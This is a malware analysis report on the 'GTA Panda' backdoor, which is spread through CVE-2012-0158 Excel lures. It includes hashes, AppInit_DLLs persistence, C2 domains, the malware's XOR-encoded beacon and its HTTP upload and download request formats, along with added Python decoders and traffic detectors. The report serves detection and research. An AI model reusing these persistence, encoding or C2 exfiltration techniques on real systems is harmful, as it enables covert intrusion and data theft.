After digging into some recent malicious XLS documents taking advantage of the tried and true CVE-2012-0158 exploit, I came upon some interesting malware, which appears to be actively targeting human rights activists and the automotive industry. Upon further inspection it appears that a number of recent domains and IP addresses are involved; however, at the time of this report only a few were active. In honor of our friends we decided to name this particular threat Grand Theft Auto (GTA) Panda, as they appear to be punching people in the face and stealing their cars. The malware used appears to extend as far back as early 2011 with earlier variants tracing back even further to 2010.
Technical Details
The XLS document was designed to lure victims in through a seemingly negative customer service review, which purported that the recipient had “Serious bad attitude to customers”.
Document Details:
MD5: CFC7254F36F9F0BD77B14218475E7112
File Size: 294,351 Bytes
The document contained another encoded document within its body beginning at offset 0xBE00, as well as an encoded executable beginning at offset 0xF400. Both were encoded using the same scheme: a single-byte XOR against the byte 0x9C and a right rotational byte shift (ROR) of 3. The inner document is what would be shown to a potential victim upon successful exploitation and was saved as "%temp%\~tmp.xls". The outer document’s metadata was stripped from the file, while the inner document contained the following metadata:
Inner Document Metadata:
Author: cool
Company: MC SYSTEM
Date Created: 5/29/2013 9:48AM
Date Last Saved: 5/29/2013 9:50AM
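The XOR-plus-rotate encoding described above can be undone mechanically; the one detail the write-up leaves open is whether the XOR or the ROR was applied first. The following Python, added here as an illustration rather than code from the report, implements both possible decode orders and keeps the one that produces a known file header (OLE2 for the inner XLS, MZ for the executable), which is how an analyst would settle the question against a real sample. The container bytes, the payload contents and the encode order used to build them are constructed; only the 0x9C key, the rotate count of 3 and the 0xBE00/0xF400 offsets come from the report.

```python
"""Decode payloads carved from the lure document (added example, not the report's tooling).

The report gives the transform (XOR 0x9C, ROR 3 per byte) but not the order of
the two steps, so both decode orders are tried and the one yielding a known
file header wins. All sample data below are constructed.
"""

XOR_KEY = 0x9C
ROT = 3

# Header magics for the two payload types the report describes.
MAGICS = {
    b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1": "OLE2 compound document (XLS)",
    b"MZ": "PE executable",
}


def ror8(b, n):
    """Rotate an 8-bit value right by n bits."""
    n %= 8
    return ((b >> n) | (b << (8 - n))) & 0xFF


def rol8(b, n):
    """Rotate an 8-bit value left by n bits (a right rotate by 8 - n)."""
    return ror8(b, (8 - n) % 8)


def encode_xor_then_ror(data):
    """Encoder used only to build the test vector: XOR, then ROR 3 (assumed order)."""
    return bytes(ror8(b ^ XOR_KEY, ROT) for b in data)


def decode(data, xor_first):
    """Undo the transform. If the encoder XORed first, the decoder must un-rotate first."""
    if xor_first:
        return bytes(rol8(b, ROT) ^ XOR_KEY for b in data)
    return bytes(rol8(b ^ XOR_KEY, ROT) for b in data)


def identify(blob):
    """Name the payload type from its leading bytes, or None if unrecognised."""
    for magic, name in MAGICS.items():
        if blob.startswith(magic):
            return name
    return None


def carve_and_decode(container, offset, length=None):
    """Decode the region at `offset` trying both step orders; return (kind, bytes).

    kind is None when neither order produced a recognised header, in which case
    the raw region is handed back so the analyst can inspect it."""
    region = container[offset:] if length is None else container[offset:offset + length]
    for xor_first in (True, False):
        plain = decode(region, xor_first)
        kind = identify(plain)
        if kind:
            return kind, plain
    return None, region


def build_sample():
    """Constructed stand-in for the lure document: filler bytes, an encoded OLE2
    header at 0xBE00 and an encoded PE header at 0xF400 (offsets from the report)."""
    fake_xls = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" + b"\x00" * 24
    fake_exe = b"MZ\x90\x00" + b"\x00" * 28
    container = bytearray(b"\x41" * 0x10000)
    container[0xBE00:0xBE00 + len(fake_xls)] = encode_xor_then_ror(fake_xls)
    container[0xF400:0xF400 + len(fake_exe)] = encode_xor_then_ror(fake_exe)
    return bytes(container)


if __name__ == "__main__":
    sample = build_sample()
    for off in (0xBE00, 0xF400):
        kind, _ = carve_and_decode(sample, off, 32)
        print(hex(off), kind)
```

Against a real document the same call is made with the whole tail from each offset and no length, and the header check doubles as a sanity test that the carve offset is right: a wrong offset produces no magic under either order.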
The dropper was actually a self-extracting 7zip archive, which contained two files that were responsible for the creation and installation of the backdoor and associated files.
SFX Dropper Details:
MD5: DD8499684DF9C314778E4DD858D049F5
File Size: 231,887 Bytes
Embedded 7zip Contents:
Filename: inst.exe
MD5: 0C856287C218C036B4EF08AD880EDEE9
File Size: 46,592 Bytes
Compile Time: 2/25/2013 9:03:04 UTC
Filename: sc.bin
MD5: 6B63CCEED30FED466E3FFA1D9E3D3D34
File Size: 190,775 Bytes
The “inst.exe” binary contained the debug path “e:\SVN\Plat1\Release\Inst.pdb”, which suggests it is maintained in a standard SVN code repository. The file “sc.bin” contained shellcode as well as a larger DLL, which in turn contained several additional PE files within a resource named “VERSION”. Interestingly, the DLL also contained the debug path “e:\SVN\Plat1\Release\Inst_dll.pdb”. The dropper, inst.exe, also had several routines to check the registry for the presence of 22 popular antivirus programs, and specifically checked for a process named “zhudongfangyu.exe”, which is part of the Chinese 360 Antivirus suite. The “inst.exe” binary was designed solely to read in the contents of the file sc.bin from the same local path, allocate memory for it, copy the contents, and finally jump to the beginning of the shellcode. “sc.bin” contained the actual routines necessary to install and configure the backdoor.
Details of embedded DLL in sc.bin:
MD5: F9966C6AD4DC1A52811FAE63FD3ACA0D
File Size: 187,904 Bytes
Compile Time: 3/13/2013 6:26:42 UTC
File System Changes:
- %temp%\~tmp.xls
- %temp%\{Hex Character(s)}.tmp
- %userprofile%\Documents\My Document\Dtl.dat
- %userprofile%\Documents\My Document\glp.uin
- %allusersprofile%\Application Data\Intel\Data\Dtl.dat (Network Config)
- %allusersprofile%\Application Data\Intel\Data\glp.uin (General Config)
- %allusersprofile%\Application Data\Intel\Sernem12.dll (Backdoor)
- %allusersprofile%\Application Data\Intel\sig.dll
- %allusersprofile%\Application Data\Intel\qjrr.dat (Encrypted DLL)
- May Create %allusersprofile%\Application Data\Intel\qjss.dat
- May Create %allusersprofile%\Application Data\Intel\Wincwq12.dat
- May Create %allusersprofile%\Application Data\Intel\ittr.dat
- May Create %allusersprofile%\Application Data\Intel\epcnge.dat
- May Create Files in %allusersprofile%\Documents\My Document\utd_CE31\ with the extension .jpg or .bmp
Volatile Evidence:
- %temp%\7ZipSfx.000\sc.bin (shellcode deleted)
- %temp%\7ZipSfx.000\inst.exe (dropper deleted)
- %allusersprofile%\Application Data\Intel\~1 (temp file)
- Creates the mutex “Local\MU_ACBPIDS08”
- Creates the mutex “Local\MU_ACB08”
- Creates the mutex “Global\{A59CF429-D0DD-4207-88A1-04090680F714}”
- May create the mutexes:
- Global\{34748A26-4EAD-4331-B039-673612E8A5FC}
- Global\{3C6FB3CA-69B1-454f-8B2F-BD157762810E}
- Global\{43EE34A9-9063-4d2c-AACD-F5C62B849089}
- Global\{A8859547-C62D-4e8b-A82D-BE1479C684C9}
Registry Changes:
- HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs -> %allusersprofile%\Application Data\Intel\Sernem12.dll
- HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs -> 1
Persistence Mechanism:
- AppInit_DLLs Key in the HKLM Hive:
- HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs which points to the loader %allusersprofile%\Application Data\Intel\Sernem12.dll
The backdoor established persistence via the DLL “Sernem12.dll”, which was configured as an AppInit DLL on the system. In order to execute the backdoor immediately after exploitation, the attacker also included an export named “Run”, which could be called from the command line via rundll32.exe. When the system is rebooted, “Sernem12.dll” will subsequently be loaded into each application that is executed within the current logged-on session. The debug path “E:\SVN\Plat1\Release\ResN.pdb” was left within the binary. Upon further inspection the DLL actually provided an extensible framework to load and execute additional encrypted modules; in this case “qjrr.dat” was an RC4-encrypted DLL which contained the backdoor functionality. It should be noted that multiple encrypted modules may be contained within the same local directory and loaded within the address space of Sernem12.dll.
00000000 72 58 96 74 39 37 39 31 32 36 00 00 00 00 00 00 rX–t979126......
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040 00 00 00 00 00 04 01 00 E1 BB 96 9B AE 4E 3E A5 ........á»–›®N>¥
Figure 1: Header of Encrypted DAT File
The loader starts by checking that the first four bytes of the respective DAT file are “72 58 96 74” (the first four bytes in Figure 1). It then reads the string that immediately follows the header, up to 0x40 bytes, and stores the value as the RC4 key (here “979126”). The size of the encrypted data (0x10400 bytes) is stored as a little-endian value just before the start of the encrypted data, at offset 0x44, with the encrypted data itself beginning at offset 0x48. The following Python script can be used to decode these encrypted DAT files.
from Crypto.Cipher import ARC4   # pycryptodome
import struct
import sys

MAGIC = bytes.fromhex('72589674')

with open(sys.argv[1], 'rb') as fh:
    binary = fh.read()

if binary[0:4] == MAGIC:
    # RC4 key: NUL-terminated string after the magic, at most 0x40 bytes long
    end = binary.find(b'\x00', 4, 0x44)
    key = binary[4:end if end != -1 else 0x44]
    # Little-endian size of the ciphertext, stored at offset 0x44
    size = struct.unpack('<I', binary[0x44:0x48])[0]
    encrypted_binary = binary[0x48:0x48 + size]
    decrypted_binary = ARC4.new(key).decrypt(encrypted_binary)
    if decrypted_binary:
        print('Binary Successfully Decrypted: Wrote %s Bytes' % hex(size))
        with open(sys.argv[1] + '.dec', 'wb') as out:
            out.write(decrypted_binary)
else:
    print('Header Structure Invalid')
Figure 2: Python Script to Decode Encrypted DAT Files
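The script above depends on pycryptodome and writes straight to disk. As an added example (not the report's script), the version below carries its own RC4 so it runs anywhere, and splits the work into a parser that returns the key, the declared size and the plaintext, which makes each step of the header walk checkable and lets a malformed file fail loudly instead of silently. The layout it parses is the one described above; the sample module and its wrapping are constructed, with the key 979126 taken from the Figure 1 dump.

```python
"""Parse and decrypt a DAT module in the Figure 1 layout (added example).

Layout, as the report describes it: magic 72 58 96 74, a NUL-terminated RC4
key of at most 0x40 bytes, a little-endian u32 ciphertext size at 0x44, and
the ciphertext from 0x48. The sample file built here is constructed.
"""
import struct

MAGIC = bytes.fromhex("72589674")
KEY_MAX = 0x40
SIZE_OFF = 0x44
DATA_OFF = 0x48


def rc4(key, data):
    """Textbook RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def parse_dat(blob):
    """Return (key, size, plaintext); raise ValueError on a malformed header."""
    if blob[:4] != MAGIC:
        raise ValueError("bad magic: %s" % blob[:4].hex())
    key = blob[4:4 + KEY_MAX].split(b"\x00", 1)[0]
    if not key:
        raise ValueError("empty RC4 key")
    (size,) = struct.unpack_from("<I", blob, SIZE_OFF)
    ciphertext = blob[DATA_OFF:DATA_OFF + size]
    if len(ciphertext) != size:
        raise ValueError("declared size 0x%X exceeds file (have 0x%X bytes)"
                         % (size, len(ciphertext)))
    return key, size, rc4(key, ciphertext)


def build_dat(key, plaintext):
    """Constructed encoder for test data (the malware's own packer is not on the page)."""
    hdr = MAGIC + key.ljust(KEY_MAX, b"\x00")   # 0x00 .. 0x43
    hdr += struct.pack("<I", len(plaintext))     # 0x44 .. 0x47
    return hdr + rc4(key, plaintext)             # ciphertext from 0x48


if __name__ == "__main__":
    # Constructed module: a fake PE stub wrapped under the Figure 1 key.
    module = b"MZ" + b"\x90" * 62
    blob = build_dat(b"979126", module)
    key, size, plain = parse_dat(blob)
    print(key, hex(size), plain[:2])
```

Because the module is a DLL, a decrypted buffer that does not start with MZ is the first sign that the key field or size field was read wrongly, so checking the first two bytes before writing anything out is worth the extra line.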
The decrypted “qjrr.dat” provided typical backdoor functionality and would allow the attacker to execute commands, enumerate system and drive information, manipulate processes, perform file management operations, and upload and download files. The backdoor contained a slightly different debug path from the previous binaries but the same drive letter, “E:\WORK\Project\T5000\Ver 1.51\Target\1.pdb”. The backdoor referenced two separate configuration files “.\Data\glp.uin” and “.\Data\Dtl.dat”. “glp.uin” was a generic unencrypted configuration file, which specified the encrypted plugins to load as well as document types of interest including .doc, .ppt, .xls, .docx, .xlsx, and .pptx. “Dtl.dat” contained the network configuration for the backdoor encoded with a single byte XOR against the byte 0x5F; the decoded network configuration block is shown in the figure below.
00000020 01 00 00 00 90 1F 00 00 00 00 00 00 74 73 72 76 ...........tsrv
00000030 61 6C 6C 2E 6D 69 63 72 6F 73 6F 66 74 2D 63 65 all.microsoft-ce
00000040 6E 74 72 65 2E 63 6F 6D 00 00 00 00 00 00 00 00 ntre.com........
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000A0 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
000000B0 90 1F 00 00 00 00 00 00 74 73 72 76 61 6C 6C 30 .......tsrvall0
000000C0 31 2E 6E 6F 72 74 6F 6E 2D 75 70 64 61 74 65 2E 1.norton-update.
000000D0 63 6F 6D 00 00 00 00 00 00 00 00 00 00 00 00 00 com.............
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000130 00 00 00 00 00 00 00 00
Figure 3: Decoded Network Configuration from "Dtl.dat"
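Stripping the 0x5F XOR is one line; the useful part for a defender is pulling the C2 entries out of the decoded block so they can be blocked or hunted for. The Python below is an added example, not the report's tooling. The record layout it parses is my reading of Figure 3 and is an assumption: records start at 0x20 and repeat every 0x8C bytes, each being a u32 flag (1), a little-endian u32 port (0x1F90 = 8080, which agrees with the ports the report gives), a u32 of unknown use, and a 128-byte NUL-padded hostname; two such records end exactly at 0x138, where the figure stops. The 0x20 bytes before the first record are not shown in the figure and are zero-filled in the constructed sample.

```python
"""Decode Dtl.dat and list its C2 entries (added example, not from the report).

Record layout is inferred from Figure 3 and is an assumption:
  u32 flag | u32 port (LE) | u32 unknown | char[128] hostname, NUL padded
starting at 0x20 and repeating every 0x8C bytes.
"""
import struct

XOR_KEY = 0x5F
FIRST_RECORD = 0x20
HOST_LEN = 0x80
RECORD_FMT = "<III%ds" % HOST_LEN        # flag, port, unknown, hostname
RECORD_LEN = struct.calcsize(RECORD_FMT)  # 0x8C


def xor_bytes(data, key):
    """Single-byte XOR; its own inverse, so it both encodes and decodes."""
    return bytes(b ^ key for b in data)


def parse_network_config(decoded):
    """Return [(hostname, port, flag), ...] for each record with a hostname."""
    entries = []
    off = FIRST_RECORD
    while off + RECORD_LEN <= len(decoded):
        flag, port, _unknown, host = struct.unpack_from(RECORD_FMT, decoded, off)
        host = host.split(b"\x00", 1)[0].decode("ascii", "replace")
        if host:
            entries.append((host, port, flag))
        off += RECORD_LEN
    return entries


def load_dtl(raw):
    """Full path from the on-disk file: strip the XOR, then parse."""
    return parse_network_config(xor_bytes(raw, XOR_KEY))


def build_sample():
    """Constructed Dtl.dat carrying the two C2 entries shown in Figure 3.
    The leading 0x20 bytes are not shown in the figure and are zeroed here."""
    body = bytearray(b"\x00" * FIRST_RECORD)
    for host in (b"tsrvall.microsoft-centre.com", b"tsrvall01.norton-update.com"):
        body += struct.pack(RECORD_FMT, 1, 8080, 0, host)
    return xor_bytes(bytes(body), XOR_KEY)


if __name__ == "__main__":
    for host, port, flag in load_dtl(build_sample()):
        print("%s:%d (flag=%d)" % (host, port, flag))
```

Running this over a recovered Dtl.dat gives the fallback order directly (the first record is tried first, per the report), and a record whose port or flag looks odd is a cue that the layout assumption does not hold for that variant.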
Network Traffic Details and Detection
The backdoor may make DNS requests to "tsrvall.microsoft-centre.com" or "tsrvall01.norton-update.com". The backdoor will first attempt to connect to "tsrvall.microsoft-centre.com" on TCP port 8080 and if that fails it will attempt to communicate to tsrvall01.norton-update.com on TCP port 8080. Communication to these sites will be over TCP using either standard HTTP requests or a custom binary protocol.
00000000 65 75 65 75 1C 11 10 75 01 14 07 12 58 5F 6C 6D eueu...u....X_lm
00000010 66 64 67 75 65 75 05 01 16 75 64 60 65 65 75 66 fdgueu...ud`eeuf
00000020 65 66 65 6D 67 62 6D 75 66 6C 6D 61 60 62 66 62 efemgbmuflma`bfb
00000030 64 67 58 5F 6C 6D 66 64 67 75 65 75 01 14 07 75 dgX_lmfdgueu...u
00000040 64 65 65 65 65 75 67 63 65 65 75 65 65 6F 64 16 deeeeugceeueeod.
00000050 6F 61 67 6F 65 66 6F 64 66 6F 63 64 75 62 60 60 oagoefodfocdub``
00000060 62 67 61 6C 65 58 5F 6C 6D 66 64 67 75 65 75 16 bgaleX_lmfdgueu.
00000070 1C 1B 75 64 65 66 66 75 03 32 17 1F 14 10 18 14 ..udeffu.2......
00000080 03 14 17 1F 14 10 65 14 19 04 17 18 14 13 04 14 ......e.........
00000090 75 36 32 17 64 14 12 61 14 0F 14 17 26 14 12 22 u62.d..a....&.."
000000A0 14 18 22 14 2C 14 16 61 14 0F 04 17 61 14 12 00 ..".,..a....a...
000000B0 14 75 04 04 17 3E 14 12 65 14 34 04 17 20 14 12 .u...>..e.4.. ..
000000C0 3E 14 36 22 17 65 14 1D 1C 14 0C 04 17 65 14 12 >.6".e.......e..
000000D0 6D 14 36 32 14 68 58 5F 6C 6D 66 64 67 75 65 75 m.62.hX_lmfdgueu
000000E0 05 19 1C 75 65 75 02 3C 3B 36 22 24 64 67 7B 31 ...ueu.<;6"$dg{1
000000F0 34 21 75 6D 75 65 75 65 75 7F 58 5F 6C 6D 66 64 4!umueueuX_lmfd
00000100 67 75 65 75 05 19 11 75 65 75 65 58 5F 6C 6D 66 gueu...ueueX_lmf
00000110 64 67 75 65 75 05 19 1C 75 64 75 24 3F 27 27 7B dgueu...udu$?''{
00000120 31 34 21 75 64 6C 75 65 75 65 75 7F 58 5F 6C 6D 14!udlueueuX_lm
00000130 66 64 67 75 65 75 05 19 11 75 64 75 65 58 5F 6C fdgueu...udueX_l
00000140 6D 66 64 67 75 65 75 05 19 1C 75 67 75 24 3F 26 mfdgueu...ugu$?&
00000150 26 7B 31 34 21 75 65 75 65 75 65 75 7F 58 5F 6C &{14!ueueueuX_l
00000160 6D 66 64 67 75 65 75 05 19 11 75 67 75 64 60 67 mfdgueu...ugud`g
00000170 58 5F CD 55 55 55 B2 55 55 55 7D 55 55 55 75 55 X_ÍUUU²UUU}UUUuU
00000180 55 55 2D 28 F2 5C 54 55 55 55 55 55 75 56 1D 55 UU-(ò\TUUUUUuV.U
00000190 55 55 05 55 55 55 CD 28 F2 5C 93 0E 54 2D 6E 55 UU.UUUÍ(ò\“.T-nU
000001A0 B6 06 B1 1B 6E 55 05 55 34 55 26 55 26 55 22 55 ¶.±.nU.U4U&U&U"U
000001B0 3A 55 27 55 31 55 6E 55 55 55 7F 55 7B 55 31 55 :U'U1UnUUUU{U1U
000001C0 3A 55 36 55 6E 55 7F 55 7B 55 25 55 25 55 21 55 :U6UnUU{U%U%U!U
000001D0 6E 55 7F 55 7B 55 2D 55 39 55 26 55 6E 55 7F 55 nUU{U-U9U&UnUU
000001E0 7B 55 31 55 3A 55 36 55 2D 55 6E 55 7F 55 7B 55 {U1U:U6U-UnUU{U
000001F0 25 55 25 55 21 55 2D 55 6E 55 7F 55 7B 55 2D 55 %U%U!U-UnUU{U-U
00000200 39 55 26 55 2D 55 6E 55 55 55 6C 6D 66 64 67 75 9U&U-UnUUUlmfdgu
00000210 65 75 05 19 1C 75 66 75 3C 21 21 27 7B 31 34 21 eu...ufu<!!'{14!
00000220 75 65 75 65 75 65 75 30 2D 25 39 3A 27 30 27 7B ueueueu0-%9:'0'{
00000230 30 2D 30 58 5F 6C 6D 66 64 67 75 65 75 05 19 11 0-0X_lmfdgueu...
00000240 75 66 75 64 65 67 58 5F 33 55 55 55 54 55 55 55 ufudegX_3UUUTUUU
00000250 54 55 55 55 55 55 75 56 05 55 55 55 7F 55 7B 55 TUUUUUuV.UUUU{U
00000260 31 55 3A 55 36 55 6E 55 7F 55 7B 55 25 55 25 55 1U:U6UnUU{U%U%U
00000270 21 55 6E 55 7F 55 7B 55 2D 55 39 55 26 55 6E 55 !UnUU{U-U9U&UnU
00000280 7F 55 7B 55 31 55 3A 55 36 55 2D 55 6E 55 7F 55 U{U1U:U6U-UnUU
00000290 7B 55 25 55 25 55 21 55 2D 55 6E 55 7F 55 7B 55 {U%U%U!U-UnUU{U
000002A0 2D 55 39 55 26 55 2D 55 6E 55 55 55 55 55 6C 6D -U9U&U-UnUUUUUlm
000002B0 66 64 67 75 65 75 05 19 1C 75 61 75 30 25 36 3B fdgueu...uau0%6;
000002C0 32 30 7B 31 34 21 75 65 75 65 75 65 75 30 2D 25 20{14!ueueueu0-%
000002D0 39 3A 27 30 27 7B 30 2D 30 58 5F 6C 6D 66 64 67 9:'0'{0-0X_lmfdg
000002E0 75 65 75 05 19 11 75 61 75 66 63 58 5F 71 55 55 ueu...uaufcX_qUU
000002F0 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 UUUUUUUUUUUUUUUU
00000300 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 UUUUUUUUUUUUUUUU
00000310 55 6C 6D 66 64 67 75 65 75 05 19 1C 75 65 58 5F Ulmfdgueu...ueX_
Figure 4: Example of Custom Binary Protocol
The information is transmitted encoded using a single byte XOR against the byte 0x55.
0 0 IDE TARG
98312 0 PTC 1500 30308278 3984573712
98312 0 TAR 10000 2600 00:1C:42:03:13:61 75572490
98312 0 CIN 1033 VgBJAEMAVABJAE0ALQBMAFQA cgB1AG4AZABsAGwAMwAyAC4AZQB4AGUA QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA=
98312 0 PLI 0 Wincwq12.dat 8 0 0 *
98312 0 PLD 0 0
98312 0 PLI 1 qjrr.dat 19 0 0 *
98312 0 PLD 1 0
98312 0 PLI 2 qjss.dat 0 0 0 *
98312 0 PLD 2 152
---cut---
Figure 5: Partially Decoded TCP Packet
The contents of the current configuration file, "glp.uin", were also transmitted within the same session, immediately following the information above. Several key pieces of information were transmitted in this first packet, including the MAC address (00:1C:42:03:13:61 on the TAR line), a reversed decimal notation of the IP address, the system’s language identifier (1033 on the CIN line), and base64-encoded Unicode representations of the hostname, the process the backdoor is executing within, and the username of the victim (the three base64 fields on the CIN line). The base64 encoded strings above decode to "VICTIM-LT rundll32.exe Administrator". I didn’t delve too far into the command structure of the protocol itself, but it appears to support up to 23 different commands which perform a wide variety of common administrative tasks. File uploads and downloads appeared to use standard HTTP formatted requests similar to those in the figure below, with a static User-Agent of "Mozilla/4.0 (compatible; MSIE 8.0; Win32)".
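Figures 4 and 5 together show that, once the 0x55 XOR is stripped, the beacon is plain text: CRLF-terminated records with space-separated fields, the third field naming the command. The Python below is an added example, not code from the report: it decodes a beacon, splits it into records and pulls out the fields the write-up calls out (MAC, language id, and the base64/UTF-16LE hostname, process and user). The first 0x40 bytes are copied verbatim from Figure 4 as a cross-check; the complete beacon is rebuilt from the Figure 5 text and re-encoded, so it is a constructed sample. Reading the 3984573712 field of the PTC record as a little-endian IPv4 address follows the author's phrase "reversed decimal notation" and is an assumption.

```python
"""Decode and field-split a beacon of the custom protocol (added example, not from the report)."""
import base64
import re
import socket
import struct

XOR_KEY = 0x55

# First four rows of Figure 4, verbatim.
FIGURE4_PREFIX = bytes.fromhex(
    "65 75 65 75 1C 11 10 75 01 14 07 12 58 5F 6C 6D "
    "66 64 67 75 65 75 05 01 16 75 64 60 65 65 75 66 "
    "65 66 65 6D 67 62 6D 75 66 6C 6D 61 60 62 66 62 "
    "64 67 58 5F 6C 6D 66 64 67 75 65 75 01 14 07 75 "
)

# Figure 5 text, used to rebuild a complete (constructed) beacon.
FIGURE5_TEXT = (
    "0 0 IDE TARG\r\n"
    "98312 0 PTC 1500 30308278 3984573712\r\n"
    "98312 0 TAR 10000 2600 00:1C:42:03:13:61 75572490\r\n"
    "98312 0 CIN 1033 VgBJAEMAVABJAE0ALQBMAFQA "
    "cgB1AG4AZABsAGwAMwAyAC4AZQB4AGUA QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA=\r\n"
)

MAC_RE = re.compile(r"^(?:[0-9A-F]{2}:){5}[0-9A-F]{2}$")


def xor55(data):
    """The transform is its own inverse, so this both encodes and decodes."""
    return bytes(b ^ XOR_KEY for b in data)


def utf16_b64(field):
    """Hostname/process/user fields are base64 of UTF-16LE text."""
    return base64.b64decode(field).decode("utf-16-le")


def le_ip(value):
    """Interpret a decimal as a little-endian in_addr (assumed reading of 'reversed')."""
    return socket.inet_ntoa(struct.pack("<I", int(value)))


def parse_beacon(raw):
    """Decode, split into records, and extract the fields the report names."""
    text = xor55(raw).decode("latin-1")
    records = [line.split(" ") for line in text.split("\r\n") if line]
    records = [r for r in records if len(r) >= 3]
    info = {"commands": [r[2] for r in records]}
    for rec in records:
        cmd, args = rec[2], rec[3:]
        if cmd == "PTC" and len(args) >= 3:
            info["ip"] = le_ip(args[2])          # assumption: see lead-in
        elif cmd == "TAR":
            macs = [a for a in args if MAC_RE.match(a)]
            if macs:
                info["mac"] = macs[0]
        elif cmd == "CIN" and len(args) >= 4:
            info["langid"] = int(args[0])
            info["hostname"], info["process"], info["user"] = (
                utf16_b64(a) for a in args[1:4])
    return info


def build_sample():
    """Constructed beacon: the Figure 5 text re-encoded with the 0x55 XOR."""
    return xor55(FIGURE5_TEXT.encode("ascii"))


if __name__ == "__main__":
    assert xor55(FIGURE4_PREFIX) == build_sample()[:len(FIGURE4_PREFIX)]
    for k, v in sorted(parse_beacon(build_sample()).items()):
        print(k, v)
```

For detection the fixed tokens survive the XOR unchanged: an IDS rule can match the encoded byte sequences of "IDE", "PTC", "TAR" or "CIN" (each byte XOR 0x55) at the expected positions, and the CRLF separator becomes the two-byte pair 58 5F that recurs throughout Figure 4.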
POST http://{hostname}:{port}/Service.asmx/%d HTTP/1.1
Accept: */*
Host: {hostname}:{port}
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Connection: Keep-Alive
Content-Type: Appplication/octet-stream
Content-Length: %d

GET http://{hostname}:{port}/images/%d.asmx?%s HTTP/1.1
Accept: */*
Host: {hostname}:{port}
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Connection: Keep-Alive
Figure 6: Example HTTP Requests to Upload and Download Files
One interesting thing to note is that the Content-Type header in the figure above is misspelled “Appplication/octet-stream”, with an extra “p”; this typo can readily be used to identify this type of traffic.
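The typo is the strongest of three request-level indicators in Figure 6; the static User-Agent and the two URI shapes are weaker on their own but useful in combination. The Python below is an added example, not from the report, that scores a raw HTTP request head against all three and returns which fired, so it can be dropped into a proxy-log or PCAP-extraction pipeline. The requests it runs on are constructed; the host and port in them are placeholders, not observed values.

```python
"""Flag the backdoor's file-transfer HTTP requests (added example, not from the report).

Indicators, all taken from Figure 6: the misspelled Content-Type
"Appplication/octet-stream", the static User-Agent, and the URI shapes
/Service.asmx/<n> (POST upload) and /images/<n>.asmx?<s> (GET download).
"""
import re

UA = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
UPLOAD_URI = re.compile(r"^(?:https?://[^/]+)?/Service\.asmx/\d+$")
DOWNLOAD_URI = re.compile(r"^(?:https?://[^/]+)?/images/\d+\.asmx\?.+$")


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, uri, headers dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, uri, headers


def score_request(raw):
    """Return the list of indicators matched; an empty list means no hit."""
    method, uri, headers = parse_request(raw)
    hits = []
    # Highest confidence: the typo in the Content-Type value (compared case-insensitively).
    if headers.get("content-type", "").lower().startswith("appplication/"):
        hits.append("content-type typo Appplication/")
    if headers.get("user-agent") == UA:
        hits.append("static user-agent")
    if method == "POST" and UPLOAD_URI.match(uri):
        hits.append("upload URI /Service.asmx/<n>")
    if method == "GET" and DOWNLOAD_URI.match(uri):
        hits.append("download URI /images/<n>.asmx?")
    return hits


# Constructed samples; c2.example.invalid:8080 is a placeholder, not an observed host.
UPLOAD = ("POST http://c2.example.invalid:8080/Service.asmx/17 HTTP/1.1\r\n"
          "Accept: */*\r\nHost: c2.example.invalid:8080\r\n"
          "User-Agent: " + UA + "\r\nConnection: Keep-Alive\r\n"
          "Content-Type: Appplication/octet-stream\r\nContent-Length: 152\r\n\r\n")
DOWNLOAD = ("GET http://c2.example.invalid:8080/images/42.asmx?abc HTTP/1.1\r\n"
            "Accept: */*\r\nHost: c2.example.invalid:8080\r\n"
            "User-Agent: " + UA + "\r\nConnection: Keep-Alive\r\n\r\n")
BENIGN = ("POST /upload HTTP/1.1\r\nHost: www.example.com\r\n"
          "User-Agent: Mozilla/5.0\r\nContent-Type: application/octet-stream\r\n"
          "Content-Length: 10\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("upload", UPLOAD), ("download", DOWNLOAD), ("benign", BENIGN)):
        print(name, score_request(req))
```

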